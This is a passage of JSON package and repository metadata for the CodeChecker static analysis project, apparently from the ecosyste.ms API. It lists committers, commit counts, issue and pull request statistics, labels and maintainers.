count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/codechecker/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/codechecker/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/codechecker/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/codechecker/related_packages","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13414,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2190},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2025-09-08T06:53:21.618Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}}],"commits":{"id":26996,"full_name":"Ericsson/codechecker","default_branch":"master","committers":[{"name":"Márton Csordás","email":"csordasmarton92@gmail.com","login":"csordasmarton","count":1479},{"name":"Gyorgy Orban","email":"gyorgy.orban@ericsson.com","login":null,"count":613},{"name":"bruntib","email":"bruntib@gmail.com","login":"bruntib","count":444},{"name":"Whisperity","email":"whisperity@gmail.com","login":"whisperity","count":234},{"name":"Daniel Krupp","email":"daniel.krupp@ericsson.com","login":"dkrupp","count":131},{"name":"Kristóf Umann","email":"dkszelethus@gmail.com","login":"Szelethus","count":118},{"name":"vodorok","email":"gabor.kutas@ericsson.com","login":"vodorok","count":76},{"name":"Boldizsar Toth","email":"boldizsar.toth@ericsson.com","login":null,"count":72},{"name":"Gabor Horvath","email":"xazax.hun@gmail.com","login":"Xazax-hun","count":56},{"name":"Sylvestre Ledru","email":"sylvestre@debian.org","login":"sylvestre","count":53},{"name":"Alex Gábor Ispánovics","email":"gabor.alex.ispanovics@ericsson.com","login":null,"count":52},{"name":"Gabor Horvath","email":"gabor.a.horvath@ericsson.com","login":null,"count":46},{"name":"Endre Fülöp","email":"endre.fulop@sigmatechnology.com","login":"gamesh411","count":40},{"name":"Jay Rajput","email":"jay24rajput@gmail.com","login":"jay24rajput","count":37},{"name":"Tibor Cservák","email":"tibor.cservak97@gmail.com","login":"cservakt","count":32},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":29},{"name":"Gabor Marton","email":"gabor.marton@ericsson.com","login":null,"count":29},{"name":"Brunner Tibor","email":"bruntib@caesar.elte.hu","login":null,"count":24},{"name":"Samat Tamerlan","email":"vez21p@inf.elte.hu","login":"stt08","count":19},{"name":"Nora Zinaeddin","email":"nora.zinaeddin@sigmatechnology.se","login":null,"count":18},{"name":"Balazs Benics","email":"balazs.benics@sigmatechnology.se","login":null,"count":18},{"name":"Maksud Baghirov","email":"xb058t@inf.elte.hu","login":"xb058t","count":15},{"name":"Gyorgy Orban","email":"o.gyorgy@gmail.com","login":"gyorb","count":13},{"name":"Endre Fülöp","email":"endre.fulop@sigmatechnology.se","login":null,"count":13},{"name":"Dimitrios Apostolou","email":"jimis@qt.io","login":"jimis","count":12},{"name":"ebagfey","email":"feyruz.baghirov@ericsson.com","login":null,"count":11},{"name":"Zinovy Nis","email":"zynis@yandex-team.ru","login":null,"count":11},{"name":"Valerii Filatov","email":"valiklfiatoff@yandex.ru","login":"feeelin","count":11},{"name":"Discookie","email":"matekos17@fazekas.hu","login":"Discookie","count":10},{"name":"zomen2","email":"33723881+zomen2","login":"zomen2","count":10},{"name":"Réka Kovács","email":"rekanikolett@gmail.com","login":"rnkovacs","count":10},{"name":"Adam Balogh","email":"adam.balogh@ericsson.com","login":null,"count":9},{"name":"Baghirov Feyruz","email":"113597150+feyruzb","login":"feyruzb","count":8},{"name":"Gergely Gulyas","email":"gergely.gulyas.ext@ericsson.com","login":null,"count":7},{"name":"Szabolcs Sipos","email":"labuwx@balfug.com","login":"labuwx","count":7},{"name":"Nora Zn","email":"nrzn31@gmail.com","login":"noraz31","count":7},{"name":"Justin Dhillon","email":"justin.singh.dhillon@gmail.com","login":"justindhillon","count":6},{"name":"Daniel Krupp","email":"dkrupp@hendrix.homenet.org","login":null,"count":6},{"name":"tmsblgh","email":"tmsblgh@me.com","login":"tmsblgh","count":5},{"name":"Lorinc Balog","email":"lorinc.balog@gmail.com","login":"lorincbalog","count":5},{"name":"Balazs Benics","email":"benicsbalazs@gmail.com","login":"steakhal","count":5},{"name":"Zinovy Nis","email":"zinovy.nis@gmail.com","login":"irishrover","count":5},{"name":"Zurab Tsinadze","email":"zurab.tsinadze@ericsson.com","login":null,"count":4},{"name":"Georg Kunz","email":"georg.kunz@ericsson.com","login":"gkunz","count":4},{"name":"Balázs Kéri","email":"1.int32@gmail.com","login":"balazske","count":4},{"name":"Milan Lakhani","email":"milan.lakhani@codethink.co.uk","login":"milanlakhani","count":3},{"name":"Abhishek Sudhakaran","email":"itzurabhi@gmail.com","login":"itzurabhi","count":3},{"name":"Archie","email":"archieatkinson97@gmail.com","login":"ArchieAtkinson","count":3},{"name":"Pieter De Gendt","email":"pieter.degendt@basalte.be","login":"pdgendt","count":3},{"name":"omahs","email":"73983677+omahs","login":"omahs","count":3},{"name":"Pascal Havé","email":"hpwxf@haveneer.com","login":"hpwxf","count":3},{"name":"Balogh Tamás","email":"tamasbalogh@Baloghs-MacBook-Pro.local","login":null,"count":3},{"name":"Lukas Barth","email":"Lukas Barth barth@mentz.net","login":null,"count":3},{"name":"Zoltán Gera","email":"gerazo80@gmail.com","login":null,"count":3},{"name":"Balogh Tamás","email":"tamasbalogh@client-139-128.wifi.elte.hu","login":null,"count":2},{"name":"Ferenc Géczi","email":"ferenc.gm@gmail.com","login":"Ferenc-","count":2},{"name":"Marcel Schneider","email":"marcel@coopmasters.de","login":"ferkulat","count":2},{"name":"Ryan Pavlik","email":"ryan.pavlik@collabora.com","login":"rpavlik","count":2},{"name":"ericLemanissier","email":"ericLemanissier","login":"ericLemanissier","count":2},{"name":"crazyBaboon","email":"nuno360@gmail.com","login":"crazyBaboon","count":2},{"name":"Alex Ispánovics","email":"igalex","login":"igalex","count":2},{"name":"tal66","email":"77445020+tal66","login":"tal66","count":2},{"name":"uhziel","email":"uhziel@gmail.com","login":"uhziel","count":2},{"name":"Дилян Палаузов","email":"git-dpa@aegee.org","login":"dilyanpalauzov","count":2},{"name":"Gunnar Trost","email":"82682037+TotalNormal2","login":"TotalNormal2","count":2},{"name":"ArnaudBienner","email":"arnaud.bienner@gmail.com","login":"ArnaudBienner","count":2},{"name":"Donát Nagy","email":"donat.nagy@ericsson.com","login":"NagyDonat","count":2},{"name":"engr-basit","email":"14pwcse1197@uetpeshawar.edu.pk","login":"engr-basit","count":2},{"name":"Süli Patrik Péter","email":"ha346e@inf.elte.hu","login":"PatrikScully","count":2},{"name":"Sarvex ☠ Jatasra","email":"sarvex.jatasra@gmail.com","login":"sarvex","count":2},{"name":"Dominik Montada","email":"dominik.montada@hightec-rt.com","login":"gargaroff","count":1},{"name":"Trust04zh","email":"trust04zh@gmail.com","login":"Trust04zh","count":1},{"name":"Satish Bysany","email":"","login":null,"count":1},{"name":"omitedy","email":"yuhyse@foxmail.com","login":null,"count":1},{"name":"ezilelm","email":"elmedin.zildzic@ericsson.com","login":null,"count":1},{"name":"einvbri","email":"vince.a.bridgers@ericsson.com","login":null,"count":1},{"name":"Waqas Mazhar","email":"waqas.mazhar@planetinnovation.com.au","login":null,"count":1},{"name":"Douglas Winship","email":"dwinship1@bloomberg.com","login":null,"count":1},{"name":"Balazs Benics","email":"balazsbenics@sigmatechnology.se","login":null,"count":1},{"name":"Antoine Bernardeau","email":"antoine.bernardeau@enyx.fr","login":null,"count":1},{"name":"Anna Medonosova","email":"anna.medonosova@gmail.com","login":null,"count":1},{"name":"Joe Stevens","email":"jstevens176@dev-10-34-27-31.pw1.bcc.bloomberg.com","login":null,"count":1},{"name":"Joe Stevens","email":"jstevens176@dev-10-34-23-0.pw1.bcc.bloomberg.com","login":null,"count":1},{"name":"Jarno Malmari","email":"jmalmari@github","login":null,"count":1},{"name":"Jani Mikkonen","email":"jani.mikkonen@varjo.com","login":null,"count":1},{"name":"Hannes","email":"hannesweisbach","login":"hannesweisbach","count":1},{"name":"Jan-Simon Möller","email":"dl9pf@gmx.de","login":"dl9pf","count":1},{"name":"Jimmy Casey","email":"casey.jimmy@gmail.com","login":"jimmycasey","count":1},{"name":"Jonah","email":"73965092+Jonah-E","login":"Jonah-E","count":1},{"name":"Julian Harty","email":"julianharty@gmail.com","login":"julianharty","count":1},{"name":"Kiet Ho","email":"tuankiet65@gmail.com","login":"tuankiet65","count":1},{"name":"Konstantin Pavlov","email":"thresh@videolan.org","login":"thresheek","count":1},{"name":"Marton Bur","email":"marton.bur@gmail.com","login":"imbur","count":1},{"name":"Pascal Bach","email":"pascal.bach@nextrem.ch","login":"bachp","count":1},{"name":"Alex Fabre","email":"alex.fabre@rtone.fr","login":"AlexFabre","count":1},{"name":"Alex Telon","email":"alex.telon@gmail.com","login":"AlexTelon","count":1},{"name":"Alexey Vishnyakov","email":"sweetvishnya@yandex-team.ru","login":"SweetVishnya","count":1},{"name":"Barnabás Domozi","email":"142594183+barnabasdomozi","login":"barnabasdomozi","count":1},{"name":"Carlos Gomes Martinho","email":"kmartinho8@gmail.com","login":"gocarlos","count":1},{"name":"David Skoland","email":"davidskoland@gmail.com","login":"OmniTroid","count":1},{"name":"David W","email":"dwiberg@gmail.com","login":"DavidWiberg","count":1},{"name":"Hannes Weisbach","email":"hannes.weisbach@agilent.com","login":null,"count":1},{"name":"elmoee","email":"elmedin_z@hotmail.com","login":"elmoee","count":1},{"name":"ningbo","email":"ningbo@zepp.com","login":"ningboRainbow","count":1},{"name":"szepet","email":"peterszecsi95@gmail.com","login":"szepet","count":1},{"name":"Romain Laneuville","email":"romain.laneuville@hotmail.fr","login":"mister-good-deal","count":1},{"name":"SirMutantRat","email":"r@661t.com","login":"SirMutantRat","count":1},{"name":"Thomas Gagneret","email":"thomas.gagneret@hexploy.com","login":"tgagneret-embedded","count":1},{"name":"TheAnyKey","email":"32773684+TheAnyKey","login":"TheAnyKey","count":1},{"name":"Stefan Seefeld","email":"stefan@seefeld.name","login":"stefanseefeld","count":1},{"name":"Savvas Etairidis","email":"falital@hotmail.com","login":"Falital","count":1},{"name":"Samuel Dolt","email":"samuel.dolt@foxtron.ch","login":"samdolt","count":1},{"name":"Sakamoto, Kazunori","email":"exKAZUu","login":"exKAZUu","count":1},{"name":"Roman Lebedev","email":"lebedev.ri@gmail.com","login":"LebedevRI","count":1},{"name":"Rasmus Diederichsen","email":"rasmus@psiori.com","login":"themightyoarfish","count":1},{"name":"Rakessh Roshan","email":"roshanrakesh7362@gmail.com","login":"Rakesh9100","count":1},{"name":"Péter Kaszab","email":"27868208+PeterKaszab","login":"PeterKaszab","count":1},{"name":"Pontus","email":"extract","login":"extract","count":1},{"name":"Vince Bridgers","email":"vince.a.bridgers@gmail.com","login":"vabridgers","count":1},{"name":"dlpartain","email":"dlpartain","login":"dlpartain","count":1},{"name":"jens persson","email":"jens@persson.cx","login":"MrShark","count":1},{"name":"startergo","email":"7897244+startergo","login":"startergo","count":1},{"name":"thedatumgirl","email":"59704142+TheDatumGirl","login":"TheDatumGirl","count":1},{"name":"totocaca123","email":"42418580+totocaca123","login":"totocaca123","count":1},{"name":"叉叉敌","email":"ievjai@126.com","login":"chasays","count":1},{"name":"Tom Hughes","email":"tom@compton.nu","login":"tomhughes","count":1},{"name":"Aaron Smith","email":"aaron@soccergeek.net","login":"geeksmith","count":1},{"name":"Gwangmu Lee","email":"gwangmu@snu.ac.kr","login":"gwangmu","count":1},{"name":"James Cowgill","email":"james.cowgill@blaize.com","login":"jcowgill","count":1},{"name":"Alex","email":"alexkrapivin@gmx.com","login":"nettle","count":1},{"name":"Daniel Mancebo","email":"dama@bang-olufsen.dk","login":"bo-dani","count":1},{"name":"Ducnguyen147","email":"nguyenanhduc9a1@gmail.com","login":"Ducnguyen147","count":1},{"name":"Einar Þórir Árnason","email":"einar.arnason@marel.com","login":"EinarArnason","count":1},{"name":"Zingo Andersen","email":"offer@zingo.org","login":"zingo","count":1},{"name":"Peter Bauer","email":"peter.m.bauer@gmail.com","login":"petermbauer","count":1}],"total_commits":3942,"total_committers":135,"total_bot_commits":29,"total_bot_committers":1,"mean_commits":29.2,"dds":0.6248097412480974,"past_year_committers":[{"name":"bruntib","email":"bruntib@gmail.com","login":"bruntib","count":47},{"name":"Daniel Krupp","email":"daniel.krupp@ericsson.com","login":"dkrupp","count":25},{"name":"Endre Fülöp","email":"endre.fulop@sigmatechnology.com","login":"gamesh411","count":19},{"name":"Samat Tamerlan","email":"vez21p@inf.elte.hu","login":"stt08","count":19},{"name":"Tibor Cservák","email":"tibor.cservak97@gmail.com","login":"cservakt","count":16},{"name":"Nora Zinaeddin","email":"nora.zinaeddin@sigmatechnology.se","login":null,"count":15},{"name":"Maksud Baghirov","email":"xb058t@inf.elte.hu","login":"xb058t","count":15},{"name":"ebagfey","email":"feyruz.baghirov@ericsson.com","login":null,"count":11},{"name":"Valerii Filatov","email":"valiklfiatoff@yandex.ru","login":"feeelin","count":11},{"name":"Whisperity","email":"whisperity@gmail.com","login":"whisperity","count":10},{"name":"Kristóf Umann","email":"dkszelethus@gmail.com","login":"Szelethus","count":9},{"name":"Discookie","email":"matekos17@fazekas.hu","login":"Discookie","count":9},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":8},{"name":"Gergely Gulyas","email":"gergely.gulyas.ext@ericsson.com","login":null,"count":7},{"name":"Baghirov Feyruz","email":"113597150+feyruzb","login":"feyruzb","count":6},{"name":"Archie","email":"archieatkinson97@gmail.com","login":"ArchieAtkinson","count":3},{"name":"Pieter De Gendt","email":"pieter.degendt@basalte.be","login":"pdgendt","count":3},{"name":"Zinovy Nis","email":"zynis@yandex-team.ru","login":null,"count":3},{"name":"Donát Nagy","email":"donat.nagy@ericsson.com","login":"NagyDonat","count":2},{"name":"Nora Zn","email":"nrzn31@gmail.com","login":"noraz31","count":1},{"name":"Einar Þórir Árnason","email":"einar.arnason@marel.com","login":"EinarArnason","count":1},{"name":"Douglas Winship","email":"dwinship1@bloomberg.com","login":null,"count":1},{"name":"einvbri","email":"vince.a.bridgers@ericsson.com","login":null,"count":1},{"name":"Joe Stevens","email":"jstevens176@dev-10-34-27-31.pw1.bcc.bloomberg.com","login":null,"count":1},{"name":"Joe Stevens","email":"jstevens176@dev-10-34-23-0.pw1.bcc.bloomberg.com","login":null,"count":1},{"name":"Alex Fabre","email":"alex.fabre@rtone.fr","login":"AlexFabre","count":1},{"name":"Alexey Vishnyakov","email":"sweetvishnya@yandex-team.ru","login":"SweetVishnya","count":1},{"name":"Barnabás Domozi","email":"142594183+barnabasdomozi","login":"barnabasdomozi","count":1},{"name":"Thomas Gagneret","email":"thomas.gagneret@hexploy.com","login":"tgagneret-embedded","count":1},{"name":"Tom Hughes","email":"tom@compton.nu","login":"tomhughes","count":1},{"name":"totocaca123","email":"42418580+totocaca123","login":"totocaca123","count":1}],"past_year_total_commits":250,"past_year_total_committers":31,"past_year_total_bot_commits":8,"past_year_total_bot_committers":1,"past_year_mean_commits":8.064516129032258,"past_year_dds":0.812,"last_synced_at":"2025-05-24T15:25:29.565Z","last_synced_commit":"82cacc6a109730342079ea08bb81d07797003007","created_at":"2023-03-07T16:33:44.778Z","updated_at":"2025-05-24T15:31:54.678Z","commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-09-05T00:00:10.343Z","repositories_count":5480019,"commits_count":853389012,"contributors_count":31098138,"owners_count":906558,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues_stats":{"full_name":"Ericsson/codechecker","html_url":"https://github.com/Ericsson/codechecker","last_synced_at":"2025-08-31T07:49:38.658Z","status":null,"issues_count":288,"pull_requests_count":715,"avg_time_to_close_issue":24932359.556603774,"avg_time_to_close_pull_request":3804588.606060606,"issues_closed_count":106,"pull_requests_closed_count":561,"pull_request_authors_count":72,"issue_authors_count":117,"avg_comments_per_issue":1.5416666666666667,"avg_comments_per_pull_request":0.6797202797202797,"merged_pull_requests_count":476,"bot_issues_count":1,"bot_pull_requests_count":70,"past_year_issues_count":81,"past_year_pull_requests_count":335,"past_year_avg_time_to_close_issue":4085025.947368421,"past_year_avg_time_to_close_pull_request":1173994.7316017316,"past_year_issues_closed_count":19,"past_year_pull_requests_closed_count":231,"past_year_pull_request_authors_count":35,"past_year_issue_authors_count":50,"past_year_avg_comments_per_issue":0.6049382716049383,"past_year_avg_comments_per_pull_request":0.3880597014925373,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":31,"past_year_merged_pull_requests_count":191,"created_at":"2023-05-10T20:44:20.300Z","updated_at":"2025-09-03T04:16:17.446Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","issue_labels_count":{"bug :bug:":64,"analyzer :chart_with_upwards_trend:":54,"enhancement :star2:":30,"web :earth_africa:":27,"server :desktop_computer:":26,"GUI :art:":24,"CLI :computer:":23,"usability :+1:":20,"dev env :rescue_worker_helmet:":14,"new feature :+1:":13,"dependencies :package:":12,"config :gear:":9,"question :grey_question:":9,"tools :hammer_and_wrench:":7,"duplicate :busts_in_silhouette:":7,"clang-tidy :dragon:":7,"package-Python 🐍":7,"refactoring 😡 ➡️ 🙂":6,"database :file_cabinet:":6,"cppcheck 🐞":6,"documentation :book:":6,"package-python 🐍":6,"platform-windows 🖥":5,"ld-logger :page_with_curl:":5,"CI :package:":5,"clang sa :dragon:":5,"report-converter 🔄":4,"test :ballot_box_with_check:":4,"good first issue":4,"other-analyzer :speech_balloon:":4,"Won't fix :-1:":4,"version :tada:":3,"API change :page_facing_up:":3,"platform-osx 🍎":3,"platform-Windows 🖥":3,"gcc :water_buffalo:":3,"discussion :bulb:":3,"platform-macOS 🍎":3,"performance :runner:":3,"python":2,"RFC :black_nib:":2,"help wanted":1,"tu_collector :page_with_curl:":1,"package-Docker 🐳":1,"javascript":1,"bazel :jigsaw:":1,"plist2html :earth_asia:":1,"bugfix :hammer:":1},"pull_request_labels_count":{"bugfix :hammer:":168,"dependencies :package:":99,"analyzer :chart_with_upwards_trend:":93,"enhancement :star2:":91,"CLI :computer:":71,"config :gear:":71,"server :desktop_computer:":55,"GUI :art:":55,"javascript":54,"python":44,"documentation :book:":41,"test :ballot_box_with_check:":41,"clang-tidy :dragon:":32,"usability :+1:":29,"database :file_cabinet:":27,"clang sa :dragon:":26,"refactoring 😡 ➡️ 🙂":24,"web :earth_africa:":22,"dev env :rescue_worker_helmet:":20,"API change :page_facing_up:":20,"WIP :bomb:":16,"version :tada:":16,"CI :package:":15,"new feature :+1:":15,"performance :runner:":14,"cppcheck 🐞":14,"dependencies":13,"report-converter 🔄":13,"gcc :water_buffalo:":13,"tools :hammer_and_wrench:":13,"ld-logger :page_with_curl:":12,"label-tool 🔖":11,"other-analyzer :speech_balloon:":6,"RDY-OnHold :stop_sign:":6,"refactoring :angry: ➡️ :slightly_smiling_face:":5,"bazel :jigsaw:":4,"deprecate :hourglass_flowing_sand:":4,"package-Python 🐍":3,"style :memo:":3,"platform-osx 🍎":2,"platform-windows 🖥":2,"package-Docker 🐳":2,"plist2html :earth_asia:":1,"tu_collector :page_with_curl:":1,"Garbage collection 🗑️":1,"platform-macOS 🍎":1,"garbage collection 🗑️":1,"package-python 🐍":1,"report-converter":1,"bug :bug:":1,"WARN :warning:: Backward compatibility breaker!":1},"issue_author_associations_count":{"NONE":111,"CONTRIBUTOR":72,"MEMBER":68,"COLLABORATOR":31},"pull_request_author_associations_count":{"CONTRIBUTOR":390,"COLLABORATOR":310,"MEMBER":91,"NONE":51},"issue_authors":{"whisperity":41,"dkrupp":38,"vodorok":20,"csordasmarton":8,"gamesh411":7,"Szelethus":6,"RobertoFioravanti":5,"pdgendt":5,"bruntib":5,"geeksmith":5,"Discookie":4,"jimis":4,"amai2012":4,"gyorb":3,"dilyanpalauzov":3,"elupus":3,"LebedevRI":3,"KankeMG":3,"feeelin":2,"petermbauer":2,"totocaca123":2,"bachp":2,"cmorty":2,"plexilcrf":2,"feyruzb":2,"baloghadamsoftware":2,"aag-norbert-lange":2,"peckto":2,"lgacnik":2,"w3ntao":2,"ChGen":2,"VenoVeno":2,"lengye7":2,"Katze719":2,"Trust04zh":1,"fjpanag":1,"rchildre3":1,"robertpaananen":1,"EtoAndruwa":1,"balazske":1,"Xazax-hun":1,"ferkulat":1,"smanoha1808":1,"stt08":1,"atar-axis":1,"olologin":1,"DonatNagyE":1,"carlsmedstad":1,"ahogen":1,"spursbob":1,"ArchieAtkinson":1,"JuditKnoll":1,"mschmart":1,"Ryyoukka":1,"AlexanderChamara322":1,"Lw-Cui":1,"mcserep":1,"AlexFabre":1,"GunMetalBull305":1,"gulyasgergely902":1,"03F001":1,"tolikzinovyev":1,"Eshnek":1,"MarkZ3":1,"martong":1,"HoBoIs":1,"detuur":1,"superkaiy":1,"pskrgag":1,"SevHub":1,"julian-poidevin":1,"dnovick":1,"aisgeorge":1,"dradoudine":1,"efagerho":1,"flaviut":1,"sandroandrade":1,"scphantm":1,"ankurkraj":1,"sylvestre":1,"lff5":1,"ryankurte":1,"UmbraMalison":1,"johnfqg":1,"evequeen":1,"gkunz":1,"KhazAkar":1,"ShangzhiXu":1,"cservakt":1,"Kirodema":1,"m-luk":1,"Rikka-Lyn":1,"Ramles97":1,"yalfg":1,"Nizihan98":1,"nolange":1,"jstevens176":1,"orjangj":1,"barnabasdomozi":1,"RobMeades":1,"ielpo":1,"matthijs":1,"mheiskan":1,"tracure1337":1,"tru":1,"sarvex":1,"Wraiyth":1,"jbulow":1,"nuudlman":1,"gjasny":1,"Arndt-MBE":1,"Stolas":1,"rdong8":1,"dholm":1,"tauchris":1,"paulosousadias":1,"y-Adrian":1},"pull_request_authors":{"bruntib":186,"dependabot[bot]":79,"Szelethus":72,"vodorok":55,"dkrupp":54,"cservakt":53,"whisperity":47,"noraz31":44,"gamesh411":41,"gulyasgergely902":38,"Discookie":18,"feyruzb":18,"irishrover":10,"csordasmarton":8,"jstevens176":8,"pdgendt":7,"stt08":6,"ArnaudBienner":5,"xb058t":5,"sylvestre":4,"gyorb":4,"SweetVishnya":4,"barnabasdomozi":4,"EinarArnason":2,"ZiperRom1":2,"gkunz":2,"tgagneret-embedded":2,"Ducnguyen147":2,"Marsman1996":2,"feeelin":2,"tomrittervg":2,"NagyDonat":2,"elupus":2,"ArchieAtkinson":2,"vabridgers":2,"cmorty":2,"vishwamartur":2,"bo-dani":2,"omahs":2,"shepelenkomikhail":2,"elmoee":2,"mcserep":2,"AlexFabre":2,"melven":2,"frankplow":2,"SirMutantRat":2,"justindhillon":2,"ChGen":1,"Ferenc-":1,"sarvex":1,"tuix":1,"jimis":1,"tinloaf":1,"martong":1,"bachp":1,"antoine-bernardeau-enyx":1,"zomen2":1,"balazske":1,"Jonah-E":1,"hannesweisbach":1,"jcowgill":1,"tristanvdb":1,"mrwsl":1,"Trust04zh":1,"coolhill":1,"salticecream":1,"petermbauer":1,"SimonHeimberg":1,"KDO-OI":1,"totocaca123":1,"tomhughes":1},"host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-09-08T00:00:17.013Z","repositories_count":10158589,"issues_count":32015733,"pull_requests_count":100103107,"authors_count":10725871,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"},"past_year_issue_labels_count":{"bug :bug:":5,"web :earth_africa:":2,"package-Python 🐍":1,"good first issue":1,"bazel :jigsaw:":1,"python":1,"enhancement :star2:":1,"GUI :art:":1,"test :ballot_box_with_check:":1,"CI :package:":1},"past_year_pull_request_labels_count":{"bugfix :hammer:":47,"dependencies :package:":27,"javascript":27,"enhancement :star2:":24,"GUI :art:":17,"python":16,"CLI :computer:":16,"dependencies":13,"test :ballot_box_with_check:":11,"server :desktop_computer:":10,"analyzer :chart_with_upwards_trend:":9,"web :earth_africa:":8,"version :tada:":7,"refactoring 😡 ➡️ 🙂":6,"documentation :book:":6,"config :gear:":6,"usability :+1:":6,"performance :runner:":6,"CI :package:":6,"bazel :jigsaw:":4,"clang sa :dragon:":4,"new feature :+1:":4,"database :file_cabinet:":4,"ld-logger :page_with_curl:":3,"label-tool 🔖":2,"API change :page_facing_up:":2,"clang-tidy :dragon:":2,"package-Docker 🐳":2,"cppcheck 🐞":2},"past_year_issue_author_associations_count":{"NONE":45,"CONTRIBUTOR":16,"MEMBER":10,"COLLABORATOR":8},"past_year_pull_request_author_associations_count":{"CONTRIBUTOR":162,"COLLABORATOR":145,"NONE":34,"MEMBER":28},"past_year_issue_authors":{"dkrupp":10,"gamesh411":5,"amai2012":4,"bruntib":4,"KankeMG":3,"geeksmith":3,"pdgendt":3,"elupus":2,"lengye7":2,"lgacnik":2,"plexilcrf":2,"peckto":2,"feeelin":2,"mheiskan":1,"matthijs":1,"Kirodema":1,"03F001":1,"nuudlman":1,"orjangj":1,"paulosousadias":1,"pskrgag":1,"smanoha1808":1,"Stolas":1,"Szelethus":1,"tauchris":1,"totocaca123":1,"tracure1337":1,"whisperity":1,"aag-norbert-lange":1,"ahogen":1,"aisgeorge":1,"AlexFabre":1,"ankurkraj":1,"ArchieAtkinson":1,"Arndt-MBE":1,"atar-axis":1,"barnabasdomozi":1,"ChGen":1,"cmorty":1,"dholm":1,"Discookie":1,"EtoAndruwa":1,"feyruzb":1,"fjpanag":1,"gulyasgergely902":1,"johnfqg":1,"jstevens176":1,"JuditKnoll":1},"past_year_pull_request_authors":{"bruntib":69,"gulyasgergely902":38,"dependabot[bot]":37,"gamesh411":32,"noraz31":31,"dkrupp":27,"cservakt":20,"Discookie":18,"Szelethus":14,"feyruzb":13,"irishrover":10,"jstevens176":8,"xb058t":5,"barnabasdomozi":4,"SweetVishnya":4,"pdgendt":4,"elupus":2,"tomrittervg":2,"NagyDonat":2,"Marsman1996":2,"whisperity":2,"feeelin":2,"AlexFabre":2,"stt08":2,"shepelenkomikhail":2,"vishwamartur":2,"frankplow":2,"melven":2,"vabridgers":2,"cmorty":2,"tomhughes":1,"SimonHeimberg":1,"mrwsl":1,"totocaca123":1,"tuix":1,"vodorok":1,"salticecream":1},"maintainers":[{"login":"dkrupp","count":92,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"whisperity","count":67,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"vodorok","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":62,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"cservakt","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"gulyasgergely902","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"feyruzb","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"xb058t","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"barnabasdomozi","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"csordasmarton","c